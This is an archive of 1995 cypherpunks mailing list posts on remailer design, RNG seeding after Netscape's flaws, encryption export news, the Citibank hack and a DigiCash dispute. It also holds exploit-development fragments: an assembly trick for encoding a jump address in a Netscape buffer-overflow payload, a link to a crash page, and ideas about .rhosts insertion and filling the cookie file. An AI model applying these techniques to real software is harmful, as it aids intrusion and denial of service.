.rhosts file with your name in it? Or, on Windows machines, inserting a virus? If an exploit is possible, any exploit is probable, given that a clever encoding of assembly instructions can be created for any code required. -Ray From rjc at clark.net Wed Sep 27 02:37:36 1995 From: rjc at clark.net (Ray Cromwell) Date: Wed, 27 Sep 95 02:37:36 PDT Subject: getting netscape to support the remailers In-Reply-To: <9509261805.AA22239@cs.umass.edu> Message-ID: <199509270937.FAA20543@clark.net> > sameer writes: > > I think that in order to get netscape to support the remailers > > the remailers will have to: > > > > A) Support S/MIME > > B) Have a documented protocol, MIME-related > > > > Did Ray Cromwell do some work towards MIMEifiying the > > remailers? My impression of his work back when he posted was that it > > trusted the remailers too much, but perhaps my memory is flawed-- in > > any case his work may be helpful towards developing a remailer > > standard, which could then help get support incorporated into > > MIME agents. Yes, a while ago I was working on this, but I dropped it as people didn't seem interested. It was part of my whole "Remailer 2.0" proposal (before mixmaster was written) I was studying ways to make it easier for mail readers to interact with remailers, in particular, messages which were split, padded, packetized, and sent along separate chains. All this without some kind of special client. I wanted to use the multipart/partial part of MIME to have the pieces combined at the recipient end and decoded using an application/remailer or application/pgp type. (this was also before PEM was worked on) So I had a lot of work to do in standardizing stuff. I started working on a remailer which combined those facets, and also 1) a remailer network which had strong authentication between remailers so that untrusted remailers could not get in the network (web of trust for remailers) 2) my virtual handle idea 3) strict addressing for virtual handles on the remailer network (e.g. set up an explicit chain to anonymous bob by mailing to remailer1#remailer2#....#remailerN#anonymous_bob. Also, if you add a '*' in the path, it means for the remailer to choose a random remailer as the next in the chain) 4) padding, packetizing, delayed delivery, creating artificial traffic to thwart traffic analysis 5) a built in keyserver and "list of active remailers" server. The list of active remailers server would also contain flags for each remailer detailing what it supports and special flags like if the machine is multiuser, single, firewalled, offline (UUCP connection only), etc. I wanted as standard, that every remailer could serve keys or atleast tell you what other remailers were active 6) socket connection for commanding the remailer so that you can bypass sendmail logging and get error/status on the message 7) direct SMTP delivery bypassing local sendmail logging I wanted to use multipart MIME to allow remailers in a network to be run from user accounts in such a way that they wouldn't accidently get mail intended for the remailer and they wouldn't have to bear responsibility for the mail sent (only the whole machine would, as it would be delivered via SMTP direct, not sendmail, so no local logs) Nevertheless, like many things, I completed about 60% of it and it got put on the back burner never to emerge. Mixmaster came along and I figured there's no point continuing. -Ray From frissell at panix.com Wed Sep 27 03:20:22 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 27 Sep 95 03:20:22 PDT Subject: cypherpunks press releases/contact list In-Reply-To: <199509262341.TAA16602@frankenstein.piermont.com> Message-ID: On Tue, 26 Sep 1995, Perry E. Metzger wrote: > Who gives a damn, anyway? Its not as though we have a "cypherpunks" > reputation to uphold. I don't know about that. If you read the three WSJ stories on the Netscape holes, you find that "Cypherpunks" moves closer to the lead 'graphs each time. Soon we'll be the lead. DCF "It is to be hoped *not* in a story about major Fibbie crypto busts." From jya at pipeline.com Wed Sep 27 04:52:01 1995 From: jya at pipeline.com (John Young) Date: Wed, 27 Sep 95 04:52:01 PDT Subject: HP KEscrew Message-ID: <199509271151.HAA03534@pipe4.nyc.pipeline.com> The Wall Street Journal, Sept 27, 1995 Hewlett Lobbies for Its Encryption Plan That Would Satisfy Tough Export Rules By Don Clark Hewlett-Packard Co. is pushing an unusual plan to protect electronic transactions around the world without running afoul of U.S. export laws. The Palo Alto, Calif., computer maker said it has been lobbying government agencies for more than a year to gain support for its proposal, which uses a data-scrambling technology to protect transactions from tampering or theft of data. Strong encryption technologies ordinarily fall under tough export rules that limit technologies which could impede U.S. wire-tapping capabilities, a source of continuing friction between the government and high-technology companies. H-P, in a plan developed with the French company Gemplus SCA, wants to split the code-making technologies into two pieces that would be approved under different government standards. One device, which could fit in a standard computer, would contain a basic encryption capability that is designed to be broadly exported without the need to seek a separate export license for each foreign user. Would Help Industry That device, dubbed an encryption engine, would be useless without the addition of another tiny piece of hardware that contains a code-making formula set at a specific strength. The second device, called a policy card, would be separately reviewed by the U.S. State Department for each customer. Government agencies, including codebreakers at the National Security Agency, would still have a say over the strength of encryption exports. But customers could build commercial applications around the proposed encryption engine, knowing that it will work with any code-making formula that governments might adopt in the future. Now they run the risk that their work will become obsolete amid policy changes in Washington, D.C., and other countries. State Department officials weren't immediately available for comment. Stewart Baker, a former NSA general counsel who now practices law in Washington, D.C., termed the H-P plan a clever answer to the problem of shifting government policy. "There was a lot of skepticism when H-P first proposed it," said Lynn McNulty, a former encryption specialist at the National Institute of Standards and Technology. "But it looks to me that they are well on the way to the next step." H-P Confident of Approval Doug McGowan, an H-P manager involved with the project, said he expects to receive U.S. approval by next year to begin shipping the encryption engine freely to Western Europe and Canada. "We believe we will receive relaxed export controls," he said. H-P's plan fits some of the NSA's objectives. For one thing, its technology embeds encryption technology in microchips that can't easily be modified by computer hackers or terrorists. H-P's policy cards also could be adapted for a controversial Clinton administration proposal called key escrow, in which mathematical keys to break codes could be stored for later use by law enforcement or intelligence agencies, Mr. McGowan said. The plan complements a parallel H-P effort to develop a new generation of "smart" data cards to let consumers buy goods and services around the world electronically. Gemplus, a huge supplier of credit and debit cards in Europe, is supplying technology to that effort along with Informix Corp., a database software maker in Menlo Park, Calif. Jeff Hudson, an Informix vice president, said the partners' proposed cards could store money and a database worth of personal information, such as medical records. That approach could eliminate the need to connect to multiple companies or agencies to manage such information, since it would be stored on each card, the companies said. [End] From jya at pipeline.com Wed Sep 27 05:03:00 1995 From: jya at pipeline.com (John Young) Date: Wed, 27 Sep 95 05:03:00 PDT Subject: SSTarget Message-ID: <199509271202.IAA04464@pipe4.nyc.pipeline.com> The Wall Street Journal, Sept 27, 1995 Microsoft and Visa Expected to Unveil Internet Technology By a WSJ Staff Reporter New York -- Microsoft Corp. and Visa International are expected to disclose details today of their technology for protecting commerce on the lnternet. The software company and bank clearinghouse have been working since last November on a plan for protecting creditcard numbers and other financial data from crooks, a major obstacle to the widespread use of computer networks for buying goods and services. As the largest players in software and credit cards, Microsoft and Visa wield considerable clout among a crowd of companies vying to set electronic-security standards. Their proposed specifications, calied Secure Transaction Technology, or STT, is partly based on a data-encryption technology popularized by RSA Data Security Inc., a closely held company in Redwood City, Calif. Other key players in the Internet-security race include MasterCard International Inc., the other name in bank cards, and Netscape Communications Corp., a leader in Internet software that has suffered some highly publicized security lapses lately. MasterCard announced plans to collaborate with Visa on security technology in June, but isn't expected to take part in the latest Visa-Microsoft announcement. [End] From m5 at dev.tivoli.com Wed Sep 27 05:13:44 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Wed, 27 Sep 95 05:13:44 PDT Subject: Netscape Stock Prices In-Reply-To: Message-ID: <9509271213.AA10200@alpha> Robert Hettinga writes: > > > >950809 75.000 53.750 55.500 3851.8 > : > : > >950925 69.000 62.250 67.000 684.0 WSJ article re: overflow bug > > Actually, Netscape is still the only game in town as far as Wall Street > goes. And of course the fact that a bug in the software is Big News only makes things better. I never see any WSJ articles about *my* bugs. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From herbs at interlog.com Wed Sep 27 05:18:34 1995 From: herbs at interlog.com (Herb Sutter) Date: Wed, 27 Sep 95 05:18:34 PDT Subject: Wild Idea for RNG Message-ID: <199509271218.IAA07658@gold.interlog.com> Warning: I'm no expert, my response is just a semi-informed opinion (emphasis on "semi-"). At 02:19 1995.09.27 -0400, Ray Cromwell wrote: >So, why not construct a turing machine with a large state transition >table, input a random program, and get a 1 or 0 bit depending on ^^^^^^ >whether it halts in X number of cycles. You could even get more >than 1 bit out of it by measuring how many cycles it takes to halt >(if it halts before X) and use the LSB. Is it as secure as >the halting problem? (intractable to devise an algorithm used >to predict a bit with more than 50% confidence if you knew the >state table?) Your randomness will depend on the prior randomness of your original input... and if you already have that, the TM won't give you any additional randomness (rather, this approach will just take all the randomness you give it and reduce it to 1 bit of randomness, losing all the rest). On the other hand, if the 'random' program is not already truly random, then you may well have patterns in the bits generated by the halting observation. For instance, if you use a known PRNG to get your "random" programs, then given the same seed you will end up with the same programs (and therefore the same resulting 'random' bits from the TM halting output)... which, in other words, gains you nothing AFAICS over simply using the PRNG's output directly, except of course that it exercises your CPU. :-) The attacker still only needs to figure out the seed. >Grab a picture of the current bitmap on your screen. Run it through >a good compression algorithm (say, an arithmetic/Q-coder or >one of the LZ schemes). Grab the LSB of every 4th byte or so. >If the screen is size 1024*768*8, that's 786432 bytes. Let's assume >a 10 to 1 compression ratio = 78643 bytes. Let's assume you take >1 bit from every 10 byte, that's 983 bits of entropy. > >The screen will often contain data like: > >random placement of icons and windows Not on my machine (or most others, I'd wager)! I thought about this, and whenever I'm running Netscape (for instance) my screen is probably identical over 50% of the time because I tend to have the same things open when I run a given program. Even in the general case, consider that most people have a preferred desktop layout (in Windows, they have ProgMan sitting in one place on the screen with usually the same groups visible/open)... not only will that piece of the screen bitmap not give you any randomness from one run to the next, but unless you go looking for "things that haven't changed since last time" your program won't even know what's reducing your randomness. >current time Better, but be careful how you use it; that's what Netscape thought too. :-) >current applications running, and the data in their windows > > >If Netscape was running for instance, part of the random bits >would come from the bitmap representation of the data in Netscape's >window which would depend on the URL being displayed. This sounds a bit better... except, of course, that when you initiate a secure session in Netscape with a specific party/server, your screen has a very good chance of looking the same each time you connect with that entity because it is the same URL. :-) Would someone who's more informed please correct my analysis? Thanks in advance, Herb ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Herb Sutter 2228 Urwin, Suite 102 voice (416) 618-0184 Connected Object Solutions Oakville ON Canada L6L 2T2 fax (905) 847-6019 From bigmac at digicash.com Wed Sep 27 05:28:04 1995 From: bigmac at digicash.com (Marcel van der Peijl) Date: Wed, 27 Sep 95 05:28:04 PDT Subject: NO weak links in DigiCash system!!! Message-ID: <199509271227.NAA14451@digicash.com> > I have a couple of problems/complaints with your ecash project. > When I was sent my Acct ID and Passwd they were sent to me plain text > instead of being PGP-encrypted first. This means that some malicious > hacker could have intercepted the e-mail message and stolen the > free cyber-bucks you were so generous as to give me. Second, on the > WWW-page where one downloads the software it does not seem to do a secure > connection between my browser and your server (on netscape there is > a small key in the lower-left hand corner that is supposed to show when > one is securely connected to a secure server). So someone could sniff my > password from the transaction when I GET the software. Also When I'm > buying/selling things it would be smart for all parties involved to > be using PGP, and I think you should stress this point more in your page. > Otherwise this is another vulnerable point in your system IMHO. Let's get this straight before spreading more of these vicious rumours that can easily get misinterpreted. DigiCash is an R&D company developing ecash. We license out our technology to banks. We are running the trial, but only have limited resources to do so. This may result in long waiting time for accounts or no answer on a tech support mail. (We are of course trying to prevent this). In a real-money system, the password can of course not be sent out in plain mail. Either it has to be transferred out-of-band (phone, paper) or PGP'd. But that would require at least ten people answering the phones, sending snailmail, etc. We do not have the resources to do so, so we send out the password plain. A malicious hacker may snatch the password and open the account for you and steal your cb$100. This, however, is not related to the security of the transactions once you open the account! The password is only for starting up the account. And of course downloading on a secure server is not relevant. The software is the same for everyone! It is just not put out for public downloading because it would mean a hundred times more people asking for tech support. It would be more secure if we used different passwords for downloading and for opening the accounts but again, that would give a LOT more problems. PGP does not add any security in the payment system. Ecash is already secure. Feel free to ask us the questions before publicly posting. It will prevent misunderstandings and libel lawsuits. // Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/ // "If you had to tell the Whole Truth, you'd never shut up." From jya at pipeline.com Wed Sep 27 05:35:34 1995 From: jya at pipeline.com (John Young) Date: Wed, 27 Sep 95 05:35:34 PDT Subject: FT on NsCPunxsters Message-ID: <199509271235.IAA07479@pipe4.nyc.pipeline.com> Financial Times, Sept 27, 1995 Cracks in the code Peter Martin calls for an easing of US restrictions on the export of encryption technology Encryption used to be a subject of interest only to spies and mathematicians. But the central role that the electronic transmission of information is playing in commerce and society make it now a technology of enormous practical relevance. Two recent stories out of many exemplify this trend. Citibank lost $400,000, it is alleged, to a Russian hacker who managed to crack its clients' passwords. The solution to this security problem: a new generation of encrypted passwords that are much harder to crack. And Netscape Navigator, the leading "browser" program for the Internet's fast-growing World Wide Web, has been shown to have flaws in its encryption routine. In theory at least, these make it possible for outsiders to read encrypted data sent over the net -- such as credit card numbers. Netscape acknowledges the problems and says it will have fixes available by today. Is this crucial technology vulnerable to determined attack by hackers and fraudsters? Before considering the question, remember that the introduction of any new technology highlights risks uncomplainingly borne for years. The safety precautions demanded of the Channel tunnel are one example, as compared with those required of traditional trains or ferries. Similarly, it is argued, people have been unhesitatingly using analogue mobile phones, reading credit card details over the telephone, and sending off faxes into the ether without any of the panic that now surrounds the issue of Internet security. The comparison is an instructive one, but not entirely fair. What worries Internet users is not so much that a determined enemy might target them for eavesdropping, or even that chance might put their credit card details in the hands of a dishonest person. Instead, they worry about the Internet's unstructured nature under which messages are passed from computer to computer across the world until they reach their final destination. In principle, this would allow a criminal to leave a "sniffer" program lurking, electronically, at one of the nodes, recognising credit card numbers as they passed by, and scooping them up for subsequent exploitation. People also fear an attack on the computers of merchants selling goods over the Internet -- each containing thousands of credit card numbers. The fear is thus not one of random theft but of systematic brigandage. Encryption is all that stops such fears paralysing electronic commerce before it has properly begun. It is therefore in the general public interest that effective encryption be widely available. The Netscape problem illustrates how easy it is for the inherent mathematical strengths of a modern encryption scheme to be overcome by an oversight in its supporting plumbing. One of the faults in Netscape's encryption, for example, stems from too predictable a method of generating the random numbers needed to make the scheme work. It also illustrates how, once a code-breaker's task is simplified by such a weakness, today's powerful networks of cheap computers make it quick to crack even the most sophisticated encryption schemes. The narrower the range of numbers through which the cracker's computers must sift in order to find a meaningful answer, the greater the probability of breaking the code within a useful amount of time. All the more reason, then, for non-Americans to view with dismay a US policy which restricts the international distribution of the most powerful forms of encryption. For national security reasons, the US insists that the version of Netscape sold outside North America must contain a weaker form of encryption than that available to Americans and Canadians. The international version is restricted to a 40-digit "key", while the North American version uses 128 digits. The longer the key, the greater the time and computing power required for the code to be cracked. In principle, given enough computing power, even a message encoded by a very long key could be cracked in time. In practice, however, the task of cracking many millions of messages to find one that is of interest makes messages secure as long as the key has enough digits. Amateur code-crackers claim to have broken the 40-digit version of the Netscape encryption scheme. Their claim is hard to verify. But there is no doubt of the weakness in the random-number generation procedure; Netscape has verified it. This fault is common to both North American and export versions of the program, so it does not result from the US government restrictions on key length. The occasion reminds us, however, that effective encryption is essential to the growth of electronic commerce. And it teaches us that simplifying the code-breaker's task -- by error in Netscape's case, by deliberate diktat in the case of the government restriction is an easy way to make transmissions vulnerable. There was never much justification for the US determination to weaken exported encryption products. There is less now. [End] --------- NYT, Sept 27, 1995 Russians Arrest 6 In Computer Thefts St. Petersburg, Russia, Sept 26 (AP) -- Russian police officers have arrested six more people in a $10 million computer theft from Citibank here, but the masterminds are said to remain at large. An officer in the organized crime division was quoted by the Itar-Tass news agency as saying that six people had been arrested in St. Petersburg on swindling charges stemming from the case involving Citibank, the chief unit of Citicorp. Weapons and tax-evaslon charges may also be filed. The police confiscated two computers and a number of computer diskettes, plus weapons and cash from the suspects. Bank and law-enforcement officials say a gang of thieves in St. Petersburg broke into Citlbank's electronic cash-management system scores ot times and transferred money into their own accounts. Several people have been arrested abroad and face charges in the United States, including Vladimir Levin, 28, reportedly the group's computer hacker. Citibank officials said they recovered all but $400,000 and upgraded the cash-management systems's electronic security after the theft. [End] --------- FT, Sept 21, 1995. Extradition in Citibank hacking case A British court yesterday approved the extradition to the US of Mr Vladimir Levin, the Russian science graduate accused of an attempted $10m (6.5m pounds) computer hacking fraud on Citibank. ... Mr Levin has been charged in the UK with offences under the Computer Misuse Act, forgery and false accounting. The US authorities are now drawing up similar charges to bring against him. Mr Levin is one of six people arrested over the alleged attempted fraud on Citibank. An FBI inquiry into the incident is continuing and it is believed that others are still being sought. When Mr Levin is returned to the US, he is likely to be closely questioned by the authorities, who are anxious to discover more of the technical details of the alleged attempted fraud. Mr Levin, who was arrested earlier this year travelling through Stansted airport in the UK, would appeal against the court's decision, his lawyers said. He has 14 days to lodge an appeal to the High Court in London. ... [End] From jlasser at rwd.goucher.edu Wed Sep 27 06:25:00 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Wed, 27 Sep 95 06:25:00 PDT Subject: "Notes" to be Eclipsed by "Netscape" In-Reply-To: Message-ID: On Tue, 26 Sep 1995, Timothy C. May wrote: > At 6:52 PM 9/25/95, Jon Lasser wrote: > > >Perhaps the Notes pricing scheme is sooo outrageous (by the standards of > >a student like myself, and probably most others, if it's still anything > >like it was at the 1.0 release) that mostpeople have had zero opportunity > >to examine the program, let alone really have time to play with it? > > I've never even _seen_ a copy of Notes running on any machine, nor do I > know directly of _any_ of my colleagues who has. (Not saying nobody has, of > course, just that I can't find anyone I know well who has.) I've seen Notes running -- the Major-name discount software chain I used to work for (peon level) used it for communications. It was slow and frustrating, but my access to it was only marginal... I certainly hadn't a chance to examine the code with a debugger, or even just play with it some. But, knowing the software, it wouldn't surprise me if there were some serious bugs in the security code. > My point? Notes is nearly invisible in the non-corporate community I now > hang out in. > > Who knows what weaknesses or bugs it has in it. Folks on our list probably > don't have much familiarity with it. Exactly... I think the product is guilty of security through obscurity, though I'm not sure it's particularly intended, just merely an artifact of the marketing strategy... > My hunch is that, as the "Wall Street Journal" reported yesterday, that IBM > overpaid for Lotus, that the notion of Notes becoming the universal > collaboration/communication option is flawed. Agreed. OTOH, before the Web was known, it made a lot of sense for corporations... Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From BRUEN at mitlns.mit.edu Wed Sep 27 06:32:06 1995 From: BRUEN at mitlns.mit.edu (Bob Bruen, MIT Lab for Nuclear Science) Date: Wed, 27 Sep 95 06:32:06 PDT Subject: Hegel Message-ID: <950927093027.2000cf@mitlns.mit.edu> James Caldwell wrote: >On 25 Sep 95 at 0:06, Hroller Anonymous Remailer wrote: >It's called the Hegelian Diclectic(sp?) first postulated by William >Hegel (an ass) in Germany approx the 1600's as a method for social change >when none could otherwise be achieved. Just for a reality check, Georg Wilhelm Hegel (1770-1831), was not an ass, but rather a brilliant philospher, even if you do like his views. I am guessing you are refering to his "dialectic", which was simply an observation of the way history worked: Thesis <---> Antithesis | Synthesis The synthesis then becomes the new thesis and history moves. It was not proposed as a method of social change, but rather a description of how history moves. It is always better to some of idea of what you are talking about before you make such rash, critical statements. Sorry for the noise to the list. Bob From rfb at lehman.com Wed Sep 27 06:36:36 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Wed, 27 Sep 95 06:36:36 PDT Subject: [NOISE] Re: Easter Eggs In-Reply-To: <199509261959.MAA28501@desiree.teleport.com> Message-ID: <9509271335.AA26916@cfdevx1.lehman.com> Date: Tue, 26 Sep 1995 12:59:54 -0700 From: Alan Olsen You also need X windows to find the Mozilla animated icon hack on Jammie Zawinski's page. ^^^^^^ Just for the record, that's Jamie. obNetscapeHack: There is a feature called a "cookie file" in Netscape that is ripe for exploitation as a security leak. If you are using a Netscape server (and you may not even need that), you can feed all sorts of information into it without the user's knowlege. I have heard of one page that overloads the cookie file until the machine runs out of drive space. I am sure that there are other exploitable holes there... Any takers? Yikes! That sounds really bad. Do you have any more information on this? For example, can the server write to anything other than $HOME/.netscape-cookies? If I write protect that file, but it's still owned by me, will Netscape still modify it? -- Rick Busdiecker Please do not send electronic junk mail! net: rfb at lehman.com or rfb at cmu.edu PGP Public Key: 0xDBD9994D www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html send mail, subject "send index" for mailbot info, "send pgp key" gets my key A `hacker' is one who writes code. Breaking into systems is `cracking'. From adam at homeport.org Wed Sep 27 07:00:11 1995 From: adam at homeport.org (Adam Shostack) Date: Wed, 27 Sep 95 07:00:11 PDT Subject: Security Update news release In-Reply-To: <9509261733.AA22080@cantina.verity.com> Message-ID: <199509271402.KAA23709@homeport.org> | > > Here is the press release we put out this morning regarding the fix | > >for RNG seed and stack overflow problems. | > | > Do the new versions use PGP's randseed.bin? If Netscape even only looks at | > data used to keep PGP secure, Netscape will be banned from my computer | > and every computer I am responsible for. -- For good. | | That doesn't quite make sense. Netscape reading randseed.bin can have no | effect on the security of PGP. I think you meant to say: "If md5 is a solid hash fucntion, and if Netscape doesn't dump core somewhere publically readable, and if Netscape doesn't accidentally have a stack overflow that causes your randseed,bin to become confused with last-url-visited, then it is very unlikely that Netscape reading your randseed.bin will have an effect on the security of your PGP keys or messages." The history of people doing the impossible is too long to not spell out your security assumptions. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From dmandl at panix.com Wed Sep 27 07:27:40 1995 From: dmandl at panix.com (dmandl at panix.com) Date: Wed, 27 Sep 95 07:27:40 PDT Subject: PGP and FBI? In-Reply-To: <199509270409.AAA00688@libws4.ic.sunysb.edu> Message-ID: On Wed, 27 Sep 1995, Deranged Mutant wrote: > There's some sort of documentary on WBAI 99.5 FM out of NYC now. > They're talking about PGP and right wing militias... the guy being > interviewed called PGP a "one time pad system" and doesn't understand > it... *sigh* Any more details on this? I know people who do shows on BAI. What was the date/time of the show? If this is true, it's pretty sad, especially since BAI's well known for being a "political" station. --Dave. -- Dave Mandl dmandl at panix.com http://wfmu.org/~davem From ses at tipper.oit.unc.edu Wed Sep 27 07:38:02 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Wed, 27 Sep 95 07:38:02 PDT Subject: Using sound cards to accelerate RSA? Message-ID: Somebody mentioned the possibility of using the a/d stage of a sound card as a source of random bits, and that brought a thought back to mind: given that a lot of sound cards are now shipping with DSP chips on board, has anyone written any code that uses the cards DSP to accelerate RSA processing? Maybe there's a mass market market for a crypto-blaster- an RNG, 3 or 6 DES chips, and a DSP. It would make for a killer linux based SHTTP server... Simon From mhw at wittsend.com Wed Sep 27 07:44:29 1995 From: mhw at wittsend.com (Michael H. Warfield) Date: Wed, 27 Sep 95 07:44:29 PDT Subject: Netscape for OS/2, when? (Re: Another Netscape Bug) In-Reply-To: <44a4kt$jda@tera.mcom.com> Message-ID: Jeff Weinstein enscribed thusly: > > In article <199509261223.JAA01800 at bud.peinet.pe.ca>, sentiono at cycor.ca (Sentiono Leowinata) writes: > > On Tue, 26 Sep 1995 05:58:19 -0400 (EDT) you wrote: > > > > >> It's not an exploit script, but you can find an auto crash "animation" > > >> for Ray's discovered bug on > > >> http://hplyot.obspm.fr/~dl/netscapesec/c1.html > > >> (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/) > > >Crashes the 16-bit Windows version 1.1N. > > >DCF > > > > Same here. For more information (not Netscape related), Web Explorer > > 1.02 for OS/2 also crashes for the long URL. > > I wish Netscape will port it to OS/2 (already ask them, but no comment > > from Netscape). I don't try it on Netscape 1.1N as it doesn't run > > reliably under Win-OS/2 (10 min -> crash! ;) > > My understanding is that OS/2 is supposed to be windows compatible, > as in "better Windows than Windows". If our windows app doesn't run > on OS/2, then isn't it IBM's bug, not ours? > Well, I'll admit that the MTBF (Mean Time Between Failures) on OS/2 would seem to be a little bit worse that the MTBGPF (Mean Time Between General Protection Faults) on Windows, but not much. If I run Netscape continuously for more than 20 minutes or so, I'm almost certain to get a GPF. I've even got a few tricks which can do it immediately. When it first comes up, Maximize the window, then hit stop, then hit another link, all before the Netscape Home Page is fully loaded. Bang! "The application Netscape has caused a General Protection Fault in module...." I've learned to let the dust settle before touching too much. BTW - This is true in 1.1N (16 bits) as well as 1.2N (32 bits) and even occures in the "purchased" browser (the office bought a copy). Has been experienced on a half dozen machines or so, 386, 486, and Pentium, with differing video drivers. I also occasionally experience a segmentation violation and core dump while using Netscape 1.1N on Solaris. No very frequently, maybe once every week or so, and I use UNIX A LOT MORE than Windows, so stability is actually even better. A GPF on Windows is roughly equivalent to a segmentation violation under UNIX since they both involve a pointer misuse resulting in an illegal memory reference. Main real difference is that a GPF on UNIX rarely takes out the operating system while under Windows a GPF is a general indication that something has committed randome acts of terrorism and Windows itself may be compromised. > --Jeff > -- > Jeff Weinstein - Electronic Munitions Specialist > Netscape Communication Corporation > jsw at netscape.com - http://home.netscape.com/people/jsw > Any opinions expressed above are mine. -- Michael H. Warfield | (770) 985-6132 | mhw at WittsEnd.com (The Mad Wizard) | (770) 925-8248 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! From asgaard at sos.sll.se Wed Sep 27 07:45:58 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Wed, 27 Sep 95 07:45:58 PDT Subject: NO weak links in DigiCash system!!! In-Reply-To: <199509271227.NAA14451@digicash.com> Message-ID: DigiCash's BigMac wrote: > Feel free to ask us the questions before publicly posting. It will > prevent misunderstandings and libel lawsuits. Libel lawsuits for misunderstandings? Ridiculous. Libel threats are very rare on the CP list, it's one of the list's features. (I can't recollect any such threat since a well-known Nym was intimidated by LD, more than a year ago - and that Nym eventually saw the light.) Go sue yourself. Mats From mark at unicorn.com Wed Sep 27 07:57:21 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Wed, 27 Sep 95 07:57:21 PDT Subject: Status of Netscape Bug Exploit (suggestions needed) Message-ID: Couldn't you either create the address in a register, and then do an indirect jump through the register, or push it onto the stack and do a ret ? You could do something like mov ecx, address + 01010101 sub ecx, 01010101 jmp [ecx] I'm not certain of the format for BSDI assembler, but I presume that's possible. You could modify the value you add and subtract to make sure there are no netscape-invalid bytes in the compiled code. Mark From tjic at OpenMarket.com Wed Sep 27 08:21:38 1995 From: tjic at OpenMarket.com (Travis Corcoran) Date: Wed, 27 Sep 95 08:21:38 PDT Subject: [ PROPOSED NEW STANDARD ] "I-like-encrypted-mail" tag Message-ID: <199509271521.LAA12800@cranmore.openmarket.com> Summary: This message tosses out an idea for conveying within an { email | usenet } message the datum "the author of this message prefers to receive PGP encrypted communications" in a standard machine-readable form. Motivation: In the most recent version of my mail-secure.el package I included a feature that allows users to maintain a list of correspondants who prefer to receive encrypted mail. This list is then used by the package at email-send-time to see if a piece of email should be encrypted. I and others on this list include tags along the lines of "PGP encrypted mail preferred" in our .sigs. It occured to me that this could be automated: (1) a standard "I-like-encrypted-mail" tag could be defined (2) cryptography-capable mail tools could scan incoming messages for this tag and add the originators of any message containing the tag to a list (3) cryptography-capable mail tools could then use this list when sending (as mail-secure.el currently does). Possible Implementations: A couple of different methods occur to me to implement step #1: (a) a new header could be defined and added to messages (as per section 3 of RFC 1505 ), along the lines of X-Rcv-Security-Prefered: PGP-Encryption (b) a certain keyword or phrase could be defined that could be inserted in the .sig block of a message. Ex: -- foo at bar.com PGP-Encrypted-Mail-Preferred I am tempted to suggest something either compatible with or in the spirit of SHTTP negotiation blocks, but restrain myself from doing so because this (a) seems needlessly baroque for the information being conveyed (b) falsely implies that a negotiation is taking place, when in fact a mere advisory is being issues. Security concerns: A temporary denial-of-service/annoyance attack could be mounted by an adversary who issues one forged message from individual A with the "PGP-encrypted-mail prefered tag" present, and then puts a fake key on a keyserver. Anyone who uses a tag-aware mail-reading package and sees this message would send future mail to individual A encrypted in a manner that didn't allow A to read it. Please mail or post any thoughts on this proposal. Thanks, TJIC From cme at acm.org Wed Sep 27 08:23:32 1995 From: cme at acm.org (cme at acm.org) Date: Wed, 27 Sep 95 08:23:32 PDT Subject: The Fortezza random number generator is not trustworthy In-Reply-To: <199509262156.OAA21527@comsec.com> Message-ID: <9509271504.AA09830@tis.com> >Date: Tue, 26 Sep 1995 14:56:54 -0700 >From: Eric Blossom > >I was under the impression that a seed for the RNG is loaded into the >Fortezza at initialization time. This would make me think that they >are using a cryptographically strong PRNG. This would give data that >appears random, but is completely determined by the initial state. > >I suspect that the "seed keys" provided by the two agencies used to >program the Clipper chips has the same properties. This makes the >question about how does the NSA get access to the key escrow database >moot. They don't need access. They know a priori all the unit keys. My favorite Clipper master key generation algorithm, in the sacrificial laptop in the Mykotronix vault, is: \[ K(n) = H_1(R_1, R_2, n) = H_2( n ) \] where $H_2$ is a damned good one-way function, as highly classified as DERD's original description of the PRNG in the chip programming process indicated, $n$ is the chip's serial number, $R_1$ and $R_2$ are the ranno seeds provided by NIST and Treasury folks and $K(n)$ is the master key for chip n. - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +---------------------------------------------- Jean Ellison (aka Mother) -+ From william at interval.net Wed Sep 27 08:51:43 1995 From: william at interval.net (William C. Archibald) Date: Wed, 27 Sep 95 08:51:43 PDT Subject: [NOISE] Re: Easter Eggs Message-ID: <9509271550.AA13262@entropy.interval.net> alano at teleport.com ]: > obNetscapeHack: There is a feature called a "cookie file" in > Netscape that is ripe for exploitation as a security leak. If you > are using a Netscape server (and you may not even need that), you > can feed all sorts of information into it without the user's > knowlege. I have heard of one page that overloads the cookie file > until the machine runs out of drive space. I am sure that there > are other exploitable holes there... Any takers? Umm. The spec says that there is a maximum cookie size and a maximum number of cookies that should be sent. I'll be the last to claim that Netscape created a 'standards-compliant' product, but they have at least recognized that these things aren't supposed to be infinitely large. rfb at lehman.com ]: > Yikes! That sounds really bad. Do you have any more information on > this? For example, can the server write to anything other than > $HOME/.netscape-cookies? If I write protect that file, but it's still > owned by me, will Netscape still modify it? The server can't write anything. Cookies are returned as HTTP response 